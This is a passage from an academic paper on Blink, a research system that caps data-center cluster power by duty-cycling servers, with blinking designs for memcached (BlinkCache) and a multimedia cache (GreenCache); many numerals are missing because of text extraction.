systems is challenging, in part, since a variety of server components, including the cpu, memory, disk, motherboard, and power supply, now consume significant amounts of power. thus, any power optimization that targets only a single component is not sufficient for energy-proportionality, since it reduces only a fraction of the total power consumption (barroso & hölzle, ; le sueur & heiser, ). as one example, due to the power consumption of non-cpu components, a modern server that uses dynamic voltage and frequency scaling in the cpu at low utilization may still operate at over % of its peak power (anderson et al., ; tolia et al., ). thus, deactivating entire servers, including most of their components, remains the most effective technique for controlling energy consumption in server farms, especially at low power levels that necessitate operating servers well below % peak power on average. however, data centers must be able to rapidly activate servers whenever workload demand increases. powernap (meisner, gold & wenisch, ) proposes to eliminate idle power waste and approximate an energy-proportional server by rapidly transitioning the entire server between a high-power active state and a low-power inactive state. powernap uses the acpi s state, which places the cpu and peripheral devices in sleep mode but pre- serves dram memory state, to implement inactivity. transition latencies at millisecond- scale, or even lower, may be possible between acpi’s fully active s state and its s state. by using s to emulate the inactive “off ” state. powernap is able to consume minimal energy we use “active” and “on” interchange- ably to reference acpi’s s state, and inactive and “off ” interchangeably to represent acpi’s s state. while sleeping. typical high-end servers draw as much as × less power in s . blink extends powernap in important ways. first, powernap is a workload-driven technique that eliminates idle server power waste—it uses rapid transitions in a workload- driven fashion to activate each server when work arrives and deactivate it when idle. in contrast, blink is a power-driven technique that regulates average node power consumption independent of workload demands. second, the powernap mechanism applies to each server independently, while blink applies to collections of servers. blinking policies, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table latencies for several desktop and laptop models to perform a complete s cycle (suspend and resume). type model s transition time (s) desktop optiplex . desktop dimension . laptop lenovo x . laptop lenovo t . laptop toshiba m . laptop olpc-xo (w/nic) . laptop olpc-xo (no nic) . which we formally define next, are able to capture, and potentially exploit, cross-server dependencies and correlations in distributed applications. finally, unlike workload-driven transitions, blinking provides benefits even for the non-ideal s transition latencies on the order of seconds that are common in practice, as we show in ‘balancing performance and fairness.’ table shows s transition latencies for a variety of platforms, as reported in powernap’s on-demand transitions show little benefit once latencies exceed ms (meisner, gold & wenisch, ). agarwal et al. ( ), with the addition of blink’s olpc-x nodes. the latencies include both hardware transitions, as well as the time to restart the os and reset its ip address. definition . the blink state of each node i is defined by two parameters that determine its duty cycle di, (i) length of the on interval ton and (ii) length of the off interval toff , such that di = ton ton+toff · % definition . a blink policy defines the blink state of each node in a cluster, as well as a blink schedule for each node. the blink schedule defines the clock time at which a specified node transitions its blink state to active, which in turn dictates the time at which the node turns on and goes off. the schedule allows nodes to synchronize their blinking with one another, where appropriate. for example, if node a frequently accesses disk files stored on node b, the blink policy should specify a schedule such that the nodes synchronize their active intervals. to illustrate how a data center employs blinking to regulate its aggregate energy usage, consider a scenario where the energy supply is initially plentiful and there is sufficient workload demand for all nodes. in this case, a feasible policy is to keep all nodes continuously on. next assume that the power supply drops by %, and hence, the data center must reduce its aggregate energy use by %. there are several blinking policies that are able to satisfy this % drop. in the simplest case, % of the nodes are turned off, while the remaining nodes continue to stay on. alternatively, another blinking policy may specify a duty cycle of di = % for every node i. there are also many ways to achieve a per-server duty cycle of % by setting different ton and toff intervals, e.g., ton = s and toff = s or ton = ms and toff = ms. yet another policy may assign different blink states to different nodes, e.g., depending on their loads, such that aggregate usage decreases by %. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we refer to the first policy in our example above as an activation policy. an activation policy only varies the number of active servers at each power level (chase et al., ; tolia et al., ), such that some servers are active, while others are inactive; the energy supply dictates the size of the active server set. in contrast, synchronous policies toggle all nodes between the active and inactive state in tandem. in this case, all servers are active for ton seconds and then inactive for toff seconds, such that total power usage over each duty cycle matches the available power. of course, since a synchronous policy toggles all servers to active at the same time, it does not reduce peak power, which has a significant impact on the cost of energy generation. an asynchronous policy may randomize the start of each node’s active interval to decrease peak power without changing the average power consumption across all nodes. in contrast to an asynchronous policy, an asymmetric policy may blink different nodes at different rates, while ensuring the necessary change in the energy footprint. for example, an asymmetric policy may be load-proportional and choose per-node blink states that are a function of current load. finally, a staggered blinking policy is a type of asynchronous policy that staggers the start time of all nodes equally across each blink interval. a staggered policy that reduces the energy footprint by blinking nodes in proportion to the current load at each node is called staggered load-proportional policy. blink and blink policies are designed to cap power consumption of a server cluster to the power supply. all of the policies above are equally effective at capping the average power consumption for a variable power signal over any time interval. however, the choice of the blink policy greatly impacts application performance. although blink’s design is application-independent, applications should be modified and made blink-aware to perform well on a blinking cluster. in this paper, we design blinking policies for two specific types of distributed applications—blinkcache, a blinking version of memcached and greencache, a blinking version of multimedia cache. in designing these policies, we profile application performance for a variety of blinking policies when subjected to different changes in available power. our goal in this paper is to demonstrate the feasibility of running distributed applications while performing well under extreme power constraints; optimizing performance for any specific workload and qos demands is beyond the scope of this paper. blink prototype blink is a combined hardware/software platform for developing and evaluating blinking applications. this section describes our prototype’s hardware and software architecture in detail. blink hardware platform blink’s current hardware platform consists of two primary components: (i) a low-power server cluster that executes blink-aware applications and (ii) a variable energy source constructed using an array of micro wind turbines and solar panels. we use renewable energy to expose the cluster to intermittent power constraints. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. energy sources we deployed an array of two wind turbines and two solar panels to power blink. each wind turbine is a sunforce air-x micro-turbine designed for home rooftop deployment, and rated to produce up to w in steady mph winds. however, in our measurements, each turbine generates approximately w of power on windy days. our solar energy source uses kyocera polycrystalline solar panels that are rated to produce a maximum of w at . v under full sunlight. although polycrystalline panels are known for their efficiency, our measurements show that each panel only generates around w of power in full sunlight and much less in cloudy conditions. we assume blinking systems use batteries for short-term energy storage and power buffering. modern data centers and racks already include ups arrays to condition power and tolerate short-term grid disruptions. we connect both renewable energy sources in our deployment to a battery array that includes two rechargeable deep-cycle resourcepower marine batteries with an aggregate capacity of , watt-hours at v, which is capable of powering our entire cluster continuously for over h. however, in this paper we focus on energy-neutral operation over short time intervals, and thus use the battery array only as a small -minute buffer. we connect the energy sources to the battery pack using a tristar t- charge controller that provides over-charging circuitry. we deployed our renewable energy sources on the roof of a campus building and used a hobo u data logger to gather detailed traces of current and voltage over a period of several months under a variety of different weather conditions. while our energy harvesting deployment is capable of directly powering blink’s server cluster, to enable controlled and repeatable experiments we leverage four extech programmable power supplies. we use the programmable power supplies, instead of the harvesting deployment, to conduct repeatable experiments by replaying harvesting traces, or emulating other intermittent power constraints, to charge our battery array. we are able to set the initial battery level for each experiment using a separate charge controller in load-control mode. since the battery’s voltage level indicates its current energy capacity, we require sensors to measure and report it. we use a data acquisition device (daq) from national instruments to facilitate voltage measurement. as shown in fig. , the prototype includes two high-precision mohm resistors between the battery terminals and employs the daq to measure voltage across each resistor. we then use the value to compute the instantaneous battery voltage, and hence, capacity. figure shows the empirically-derived capacity of our prototype’s battery as a function of its voltage level. in addition to battery voltage, we use dc current transducers to measure the current flowing from the energy source into the battery, and the current flowing from the battery to the cluster. the configuration allows blink to accurately measure these values every second. low-power server cluster our blink prototype uses a cluster of low-power server nodes. to match the energy footprint of the cluster with the power output of our energy harvesting deployment we construct our prototype from low-power nodes that use amd geode processor motherboards. each motherboard, which we scavenge from olpc-xo laptops, consists of a mhz amd geode lx cpu, mb ram, a gb solid-state flash disk, and a linksys sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure hardware architecture of the blink prototype. usb ethernet nic. each node runs the fedora linux distribution with kernel version . . . we connect our node cluster together using an energy-efficient switch (netgear gs ) that consumes w. each low-power node consumes a maximum of . w, and together with the switch, the node cluster has a total energy footprint of around w. an advantage of using xo motherboards is that they are specifically optimized for rapid s transitions that are useful for blinking. further, the motherboards use only . w in s and . w in s at full processor and network utilization. the wide power range in these two states combined with the relatively low power usage in s makes these nodes an ideal platform for demonstrating the efficacy of blink’s energy optimizations. though xo motherboards are energy-efficient and consume little power even at full utilization they are not suitable for running applications which require large persistent sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure empirically-measured battery capacity as a function of voltage for our deep-cycle battery. we consider the battery empty below v, since using it beyond this level will reduce its lifetime. storage, such as a multimedia cache. the same design also scales to more powerful servers. as a result, for our multimedia cache application, we design a blink-aware cluster, but we replace xo motherboards with mac minis. each mac mini consists of a . ghz intel core duo processors, gb ram, and a gb flash-based ssd. we boot each mac mini in text mode and unload all unnecessary drivers in order to minimize the time it takes to transition into s . with the optimizations, the time to transition to and from acpi’s s state on the mac mini is one second, and the power consumption in s and s is w and w respectively. blink software architecture blink’s software architecture consists of an application-independent control plane that combines a power management service with per-node access to energy and node-level statistics. blink-aware applications interact with the control plane using blink apis to regulate their power consumption. the power management service consists of a power manager daemon that runs on a gateway node and a power client daemon that runs on each cluster node. the architecture separates mechanism from policy by exposing a single simple interface for applications to control blinking for each cluster node. the power manager daemon has access to the hardware sensors, described above, that monitor the battery voltage and current flow. each blink power client also monitors host-level metrics on each cluster node and reports them to the power manager. these metrics include cpu utilization, network bandwidth, and the length of the current active period. the power client exposes an internal rpc interface to the power manager that allows it to set a node’s blinking pattern. to set the blinking pattern, the power client uses the timer of the node’s real-time clock (rtc) to automatically sleep and wake up, i.e., transition back to s , at specific intervals. thus, the power client is able to set repetitive active and inactive durations. for example, the power manager may set a node to repeatedly be active for s and inactive for s. in this case, the blink interval is s with sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table blink apis for setting per-node blinking schedules. blinking interface setdutycycle(int nodeid, int onpercentage) setblinkinterval(int nodeid, int interval) syncactivetime(int node, long currenttime) forcesleep(int nodeid, int duration) table blink’s measurement apis that applications use to inform their blinking decisions. measurement interface getbatterycapacity() getbatteryenergy() getchargerate(int lastinterval) getdischargerate(int lastinterval) getserverloadstats(int nodeid) the node being active % of the time and inactive % of the time. we assume that nodes synchronize clocks using a protocol, such as ntp, to enable policies that coordinate blink schedules across cluster nodes. the impact of clock synchronization is negligible for our blink intervals at the granularity of seconds, but may become an issue for blink intervals at the granularity of milliseconds or less. note that clock synchronization is not an issue for applications, such as memcached, that do not perform inter-node communication. transitioning between s and s incurs a latency that limits the length of the blink interval. shorter blink intervals are preferable since they allow each node to more closely match the available power, more rapidly respond to changes in supply, and reduces the battery capacity necessary for short term buffering. the xo motherboard yields s sleep latencies that range from roughly ms to s depending on the set of active devices and drivers (see table ). for instance, since our usb nic driver does not implement the acpi reset resume function, we must unload and load its driver when transitioning to and from s . as a result, the latency for xo motherboard is near s. similarly, with similar optimizations, the time to transition to and from acpi’s s state on the mac mini is s. unfortunately, inefficient and incorrect device drivers are commonplace, and represent one of the current drawbacks to blinking in practice. the blink control plane exposes an rpc interface to integrate with external applications as shown in tables and . applications use these apis to monitor input/output current flow, battery voltage, host-level metrics and control per-node blinking patterns. since blink is application-independent, the prototype does not report application-level metrics. blinkcache: blinking memcached memcached is a distributed in-memory cache for storing key-value pairs that significantly reduces both the latency to access data objects and the load on persistent disk-backed storage. memcached has become a core component in internet services that store vast sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. amounts of user-generated content, with services maintaining dedicated clusters with s to , s of nodes (ousterhout et al., ). since end users interact with these services in real-time through web portals, low-latency access to data is critical. high page load latencies frustrate users and may cause them to stop generating new content (nah, ), which is undesirable since these services’ primary source of revenue derives from their content, e.g., by selling targeted ads. memcached overview memcached’s design uses a simple and scalable client-server architecture, where clients request a key value directly from a single candidate memcached server with the potential to store it. clients use a built-in mapping function to determine the ip address of this candidate server. initial versions of memcached determined the server using the function hash(key)%numservers, while the latest versions use the same consistent hashing approach popularized in dhts, such as chord (stoica et al., ). in either case, the key values randomly map to nodes without regard to their temporal locality, i.e., popularity. since all clients use the same mapping function, they need not communicate with other clients or servers to compute which server to check for a given key. likewise, memcached servers respond to client requests (gets and sets) without communicating with other clients or servers. this lack of inter-node communication enables memcached to scale to large clusters. importantly, clients maintain the state of the cache, including its consistency with persistent storage. as a result, applications are explicitly written to use memcached by (i) checking whether an object is resident in the cache before issuing any subsequent queries, (ii) inserting a newly referenced object into the cache if it is not already resident, and (iii) updating a cached object to reflect a corresponding update in persistent storage. each memcached server uses the least recently used (lru) replacement policy to evict objects. one common example of a cached object is an html fragment generated from the results of multiple queries to a relational database and other services. since a single http request for many internet services can result in over internal, and potentially sequential, requests to other services (decandia et al., ; ousterhout et al., ), the cache significantly decreases the latency to generate the html. access patterns and performance metrics the popularity of web sites has long been known to follow a zipf-like distribution (breslau et al., ; wolman et al., ), where the fraction of all requests for the ith most popular document is proportional to /iα for some constant α. previous studies (breslau et al., ; wolman et al., ) have shown that α is typically less than one for web site popularity. the key characteristic of a zipf-like distribution is its heavy tail, where a significant fraction of requests are for relatively unpopular objects. we expect the popularity of user-generated content for an internet service to be similar to the broader web, since, while some content may be highly popular, such as a celebrity’s facebook page, most users are primarily interested in either their own content or the content of close friends and associates. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the popularity rank, by number of fans, for all million public group pages on facebook follows a zipf-like distribution with α = . . as a test of our expectation, we rank all million user-generated fan pages on facebook by their number of fans. we use the size of each page’s fan base as a rough approximation of the popularity of its underlying data objects. figure confirms that the distribution is zipf-like with α approximately . . recent work also states that facebook must store a significant fraction of their data set in massive memcached clusters, i.e., on the order of , nodes, to achieve high hit rates, e.g., % of the entire data set to achieve a . % hit rate (ousterhout et al., ). this characteristic is common for zipf-like distributions with low α values, since many requests for unpopular objects are inside the heavy tail. thus, the distribution roughly divides objects into two categories: the few highly popular objects and the many relatively unpopular objects. as cache size increases, it stores a significant fraction of objects that are unpopular compared to the few popular objects, but nearly uniformly popular compared to each other. these mega-caches resemble a separate high-performance storage tier (ousterhout et al., ) for all data objects, rather than a small cache for only the most popular data objects. before discussing different design alternatives for blinkcache, we define our perfor- mance metrics. the primary cache performance metric is hit ratio, or hit rate, which represents the percentage of object requests that the cache services. a higher hit rate indicates both a lower average latency per request, as well as lower load on the back-end storage system. in addition to hit rate, we argue that fairness should be a secondary performance metric for large memcached clusters that store many objects of equal popularity. a fair cache distributes its benefits—low average request latency—equally across objects. caches are usually unfair, since their primary purpose is to achieve high hit rates by storing more popular data at the expense of less popular data. however, fairness increases in importance when there are many objects with a similar level of popularity, as in today’s large memcached clusters storing data that follows a zipf-like popularity sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. distribution. an unfair cache results in a wide disparity in the average access latency for these similarly popular objects, which ultimately translates to end-users receiving vastly different levels of performance. we use the standard deviation of average request latency per object as our measure of fairness. the lower the standard deviation the more fair the policy, since this indicates that objects have average latencies that are closer to the mean. blinkcache design alternatives we compare variants of three basic memcached policies for variable power constraints: an activation policy, a synchronous policy, and an asymmetric load-proportional policy. in all cases, any get request to an inactive server always registers as a cache miss, while any set request is deferred until the node becomes active. we defer a discussion of the implementation details using blink to the next section. • activation policy. an activation policy ranks servers ...n and always keeps the top m servers active, where m is the maximum number of active servers the current power level supports. we discuss multiple activation variants, including a static variant that does not change the set of available servers in each client’s built-in mapping function to reflect the current set of active servers, and a dynamic variant that does change the set. we also discuss a key migration variant that continuously ranks the popularity of objects and migrates them to servers ...n in rank order. • synchronous policy. a synchronous policy keeps all servers active for time t and inactive for time t − t for every interval t, where t is the maximum duration the current power level supports and t is short enough to respond to power changes but long enough to mitigate blink overhead. the policy does not change the set of available servers in each client’s built-in mapping function, since all servers are active every interval. • load-proportional policy. a load-proportional policy monitors the aggregate popularity of objects pi that each server i stores and keeps each server active for time ti and inactive for time t − ti for every interval t. the policy computes each ti by distributing the available power in the same proportion as the aggregate popularity pi of the servers. the load-proportional policy also migrates similarly popular objects to the same server. activation policy a straightforward approach to scaling memcached as power varies is to activate servers when power is plentiful and deactivate servers when power is scarce. one simple method for choosing which servers to activate is to rank them ...n and activate and deactivate them in order. since, by default, memcached maps key values randomly to servers, our policy for ranking servers and keys is random. in this case, a static policy variant that does not change each client’s built-in mapping function to reflect the active server set arbitrarily favors keys that happen to map to higher ranked servers, regardless of their popularity. as a result, requests for objects that map to the top-ranked server will see a significantly lower average latency than requests for objects that happen to map to the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure to explicitly control the mapping of keys to servers, we interpose always-active request proxies between memcached clients and servers. the proxies are able to monitor per-key hit rates and migrate similarly popular objects to the same nodes. bottom-ranked server. one way to correct the problem is to dynamically change the built-in client mapping function to only reflect the current set of active servers. with constant power, dynamically changing the mapping function will result in a higher hit rate since the most popular objects naturally shift to the current set of active servers. to eliminate invalidation penalties and explicitly control the mapping of individual keys to servers we interpose an always-active proxy between memcached clients and servers to control the mapping (fig. ). in this design, clients issue requests to the proxy, which maintains a hash table that stores the current mapping of keys to servers, issues requests to the appropriate back-end server, and returns the result to the client. synchronous policy the migration-enabled activation policy, described above, approaches the optimal policy for maximizing the cache’s hit rate, since ranking servers and mapping objects to them according to popularity rank makes the distributed cache operate like a centralized cache that simply stores the most popular objects regardless of the cache’s size. we define optimal as the hit rate for a centralized cache of the same size as the distributed memcached instance under the same workload. however, the policy is unfair for servers that store similarly popular objects, since these servers should have equal rankings. the activation policy is forced to arbitrarily choose a subset of these equally ranked servers to deactivate. in this case, a synchronous policy is significantly more fair and results in nearly the same hit rate as the optimal activation policy. to see why, consider the simple -node memcached cluster in fig. with enough available power to currently activate half the cluster. there is enough power to support either (i) our activation policy with migration that keeps two nodes continuously active or (ii) a synchronous policy that keeps four nodes active half the time but synchronously blinks them between the active and inactive state. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure graphical depiction of a static/dynamic activation blinking policy (a), an activation blinking policy with key migration (b), and a synchronous blinking policy (c). for now we assume that all objects are equally popular, and compare the expected hit rate and standard deviation of average latency across objects for both policies, assuming a full cache can store all objects at full power on the nodes. for the activation policy, the hit rate is %, since it keeps two servers active and these servers store % of the objects. since all objects are equally popular, migration does not significantly change the results. in this case, the standard deviation is . ms, assuming an estimate of ms to access the cache and ms to regenerate the object from persistent storage. for a synchronous policy, the hit rate is also %, since all nodes are active half the time and these nodes store % of the objects. however, the synchronous policy has a standard deviation of ms, since all objects have a % hit probability, if the access occurs when a node is active, and a % miss probability, if the access occurs when a node is inactive. rather than half the objects having a ms average latency and half having a ms average latency, as with activation, a synchronous policy ensures an average latency of . ms across all objects. note that the synchronous policy is ideal for a normal memcached cluster with a mapping function that randomly maps keys to servers, since the aggregate popularity of objects on each server will always be roughly equal. further, unlike an activation policy that uses the dynamic mapping function, the synchronous policy does not incur invalidation penalties and is not arbitrarily unfair to keys on lower-ranked servers. load-proportional policy a synchronous policy has the same hit rate as an activation policy when keys have the same popularity, but is significantly more fair. however, an activation policy with migration is capable of a significantly higher hit rate for highly skewed popularity distributions. a proportional policy combines the advantages of both approaches for zipf-like distributions, where a few key values are highly popular but there is a heavy, but significant, tail of similarly unpopular key values. as with our activation policy, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table summary of the best policy for a given performance metric and workload combination. metric workload best policy hit rate uniform synchronous hit rate zipf activation (migration) fairness uniform/zipf synchronous fairness + hit rate zipf load-proportional a proportional policy ranks servers and uses a proxy to monitor object popularity and migrate objects to servers in rank order. however, the policy distributes the available power to servers in the same proportion as the aggregate popularity of their keys. for example, assume that in our server cluster after key migration the percentage of total hits that go to the first server is %, the second server is %, the third server is %, and the fourth server is %. if there is currently w of available power then the first server ideally receives w, the second server w, the third server w, and the fourth server w. these power levels then translate directly to active durations over each interval t. in practice, if the first server’s maximum power is w, then it will be active the entire interval, since its maximum power is w. the extra w is distributed to the remaining servers proportionally. if all servers have a maximum power of w, the first server receives w, the second server receives w, i.e., % of the remaining w, the third server receives . w, and the fourth server receives . w. these power levels translate into the following active durations for a s blink interval: s, s, s, and s, respectively. the hit rate from a proportional policy is only slightly worse than the hit rate from the optimal activation policy. in this example, we expect the hit rate from an activation policy to be % of the maximum hit rate from a fully powered cluster, while we expect the hit rate from a proportional policy to be . %. however, the policy is more fair to the servers— %, %, and %—with similar popularities, since each server receives a similar total active duration. the zipf distribution for a large memcached cluster has similar attributes. a few servers store highly popular objects and will be active nearly % of the time, while a large majority of the servers will store equally unpopular objects and blink in proportion to their overall unpopularity. summary table provides a summary of the best policy for each performance metric and workload combination. in essence, an activation policy with key migration will always have the highest hit rate. however, for distributions with equally popular objects, the synchronous policy achieves a similar hit rate and is more fair. a load-proportional policy combines the best attributes of both for zipf-like distributions, which include a few popular objects but many similarly unpopular objects. we evaluate these design alternatives in ‘evaluation.’ greencache: blinking multimedia cache in the previous section we described how a stateless in-memory cache server can leverage the blinking abstraction to perform well on intermittent power. in this section, we study sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the characteristics of a distributed multimedia cache, which serves videos requested by clients, either by fetching them from the cache or retrieving them from backend servers. we assume the cache is write-through in that it stores cached videos on disk. a distributed multimedia cache is different than memcached in many ways—(a) it is not a key-value storage system and, unlike memcached, it streams data to multimedia players, (b) it stores data on persistent storage and its data size is often much larger than that of memcached, and (c) like any streaming server it can push data in advance to multimedia players to minimize buffering time and enhance viewers’ experience. in our analysis, we use traces of youtube traffic as our data source, since youtube is one of the most popular user-generated video content site and google deploys , s of servers to serve youtube requests made by users all around the world. multimedia cache overview multimedia caches are widely used to reduce backhaul bandwidth usage and improve viewers’ experience by reducing buffering time or access latency. apart from traditional multimedia servers, network operators have also started deploying multimedia caches at cellular towers to cater for the growing demand of multimedia content from smartphone users. traditionally, network operators have deployed caches only at centralized locations, such as operator peering points, in part, for both simplicity and ease of management (xu et al., ). however, researchers and startups have recently recognized the benefit of placing caches closer to edge (xu et al., ; stoke solutions, ). co-locating server caches closer to cell towers reduces both access latency, by eliminating the need to route requests for cached data through a distant peering point, and backhaul bandwidth usage from the cell tower to the peering point. caches co-located with cell towers primarily target multimedia data, since it consumes the largest fraction of bandwidth and is latency-sensitive. we study the design of greencache in the context of such a distributed multimedia cache for cellular towers. many of these cellular towers, especially in developing countries, are located in remote areas without reliable access to power. as a result, renewable energy sources have been proposed to power these cellular towers (guay, ; balshe, ). to handle intermittency in the power supply, we assume a cache architecture that comprises of a number of low-power servers, since a single large cache is not energy-proportional, and, thus, not well-suited to operating off intermittent renewable energy sources. the advantage of a distributed multimedia cache is that it allows the cache size to scale up and down based on available power. however, it introduces a new complication: if servers are inactive due to power shortages by renewables then the data cached on them becomes unavailable. if data resides on an inactive server, the client must either wait until the server is active, e.g., there is enough power, or retrieve the already cached data again from the origin server. in this case, the blinking abstraction enables the cache to provide service, albeit at degraded performance, during shortfall periods. in essence, blinking provides a cache with new options in its design space. rather than having a small cache composed of the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the top part of the figure shows a potential streaming schedule for a blinking node while the bottom half shows the smooth play out with is achieved with the aid of a client-side buffer. number of always-on servers the available power can sustain, blinking provides the option of having a much larger cache composed of servers that are active for only a fraction of time each blink interval, e.g., active for s during each minute interval. the use of blinking raises new challenges in multimedia cache design. the main challenge is to ensure smooth uninterrupted video playback even while blinking. doing so implies that caches have to stream additional data during their active periods to compensate for lack of network streaming during sleep periods. further, end-clients will need to employ additional client-side buffers and might see higher startup latencies. since multimedia applications are very sensitive to fluctuation in network bandwidth that might cause delayed data delivery at the client, most applications prefer that video players employ a buffer to smooth out such fluctuations and provide an uninterrupted, error free play out of the data. this buffer, which already exists for most multimedia applications on the client side, integrates well into the blinking approach since it also allows the cache to bridge outage times in individual cache servers, as shown in fig. . a blinking cache will stream additional chunks when active, which are buffered at the client. as shown in this figure, the player is then able to play the video smoothly and masks interruptions from the viewer as long as it gets the next chunk of data before the previous chunk has finished playing. finally, in a typical cell tower or g/ g/wimax scenario the downstream bandwidth (∼ – mbps) is much less than the bandwidth a cache server can provide, which is sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. generally limited by its network card and disk i/o. so, the cache server can potentially reduce its energy consumption by sending data at its full capacity for a fraction of a time interval (usually few seconds) and going to a low-power state for the remaining period of the time interval, as shown in fig. . in essence, the server could employ the blinking abstraction to reduce its energy footprint while still satisfying the downstream bandwidth requirement of the cell tower or wimax station. moreover, blinking facilitates a cache to employ more servers than it can keep active with the available power, and thus provides an opportunity to reduce server load and bandwidth usage. the primary drawback of a blinking cache is that it stalls a request if the requested video is not currently available on an active server. if a client requests a video that is present on an inactive server, the cache can either get the video from the back-end server or the client pauses play out until the inactive server becomes active. while getting the video from the back-end server, instead of waiting for the inactive server to become active, reduces the buffering time, it increases the bandwidth cost. as we describe later in this section, greencache uses a low-power always-on proxy and staggered load-proportional blinking policy to reduce buffering time while sending requests to back-end servers only if data is not available in the cache. youtube trace analysis to inform the design of greencache based on the characteristics of multimedia traffic and viewer behavior, we analyze a network trace that was obtained by monitoring youtube traffic entering and leaving a campus network at the university of connecticut. the network trace is collected with the aid of a monitoring device consisting of pc with a data acquisition and generation (dag) card (endace, ), which can capture ethernet frames. the device is located at a campus network gateway, which allows it to capture all traffic to and from the campus network. it was configured to capture a fixed length header of all http packets going to and coming from the youtube domain. the monitoring period for this trace was h. this trace contains a total of , requests for youtube videos out of which ∼ % of the video requests are single requests which leaves about % of the multiple requests to take advantage of caching of the requested videos. we would like to point out that a similar caching potential ( % in this case) has been reported in a more global study of g networks traffic analysis by erman et al. ( ). figure shows the popularity distribution of the most popular videos, which is obtained based on the user requests recorded in the trace. this figure only shows the most popular videos since the trace contains many videos with a very low popularity (< requests) and we wanted to depict the distribution of the most popular videos in more detail. the data obtained from the analysis of the trace shows that, despite the very long tail popularity distribution, caching can have an impact on the performance of such a video distribution system. in earlier work (khemmarart et al., ), we have shown that, not only caching but also the prefetching of prefixes of videos that are shown on the related video list of a youtube video page can improve the viewers experience of watching videos. further analysis of the sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure video popularity ( out of , ). trace revealed that , request out of the , had the tag related video (∼ %), which indicates that these videos have been chosen by viewers from the related video list that is shown on each youtube video’s web page. in addition to identifying videos that are selected from the related list, we also determine the position on the related list the video was selected from and show the result in fig. a. it shows that users tend to request from the top videos shown on the related list of a video, which accounts for % of the related video requests in the trace. this data shows that, prefetching the prefixes of the top videos shown on the related list of a currently watched video can significantly increase viewer’s experience, since the initial part can be streamed immediately from a location close to the client. based on these results, we decided to evaluate a blinking multimedia cache that performs both, traditional caching, and prefix prefetching for the top videos on the related video list. we also analyze the trace to investigate if viewers switch to a new video before they completely finish watching the current video. in order to analyze this behaviour, we look into the timestamps of a user requesting two consecutive videos. we calculate the difference of these timestamps and compare it with the total length of the first video requested to determine if the user has switched between videos before the previous video is completely viewed. figure b shows the number of occurrences (in percent out of the total number of videos watched) a video is watched for x% of its total length. this result shows that only in % of the cases videos are watched completely (also this number is similar to the global study performed by erman et al. ( )). in all other cases only part of the video is watched, with the majority of these cases (∼ %) falling in the – % viewing session length. this result let us to the decision to divide a video into equal-sized chunks, which allows for the storage of different chunks that belong to a single video on different nodes of the cache cluster. in ‘minimizing bandwidth cost,’ we describe how the chunk size is sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure youtube trace related videos and switch time analysis. (a) related video position analysis. (b) video switching time analysis. figure greencache architecture. determined and how chunking a video can reduce the uplink bandwidth usage if used on a blinking multimedia cache cluster. greencache design figure depicts greencache’s architecture, which consists of a proxy and several cache servers. the proxy maintains a video→chunk mapping and a chunk→node mapping, sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. while also controlling chunk server placement and eviction. clients, e.g., web browsers, connect to video servers through the proxy, which fetches the requisite data from one or more of its cache servers, if the data is resident in the cache. if the data is not resident, the proxy forwards the request to the host, i.e., backend server. the proxy stores metadata to access the cache in its own memory, while video chunks reside on stable storage on each cache server. similar to blinkcache, greencache also includes a power manager, that monitors available power and energy stored in a battery using hardware sensors, e.g., a voltage logger and current transducer. the power manager implements various blinking policies to control nodes’ active and inactive intervals to match the cache’s power usage to the available power. the power manager communicates with a power client running on each cache server to set the start time and active period every blink interval. the power client activates the node at the start time and deactivates the node after the active period every blink interval, and thus controls node-level power usage by transitioning the node between active and inactive states. as discussed earlier, the primary objective of a multimedia cache is to reduce buffering (or pause) time at clients and the bandwidth usage between the cache and origin servers. next, we describe greencache’s techniques to both reduce bandwidth usage to the backend origin servers, while also minimizing buffering (or pause) time at the client. minimizing bandwidth cost as fig. indicates, all videos are not equally popular. instead, a small number of videos exhibit a significantly higher popularity than others. similar to other multimedia caches, greencache has limited storage capacity, requiring it to evict older videos to cache new videos. an eviction strategy that minimizes the bandwidth usage each interval will evict the least popular videos during the next interval. however, such a strategy is only possible if the cache knows the popularity of each video in advance. to approximate a video’s future popularity, greencache maintains each video’s popularity as an exponentially-weighted moving average of a video’s accesses, updated every blink interval. the cache then evicts the least popular videos if it requires space to store new videos. as shown in fig. b, most videos are not watched completely most of the time. in fact, the figure shows that users of youtube watch less than % of the videos to completion. in addition, users might watch the last half of a popular video less often than the first half of an 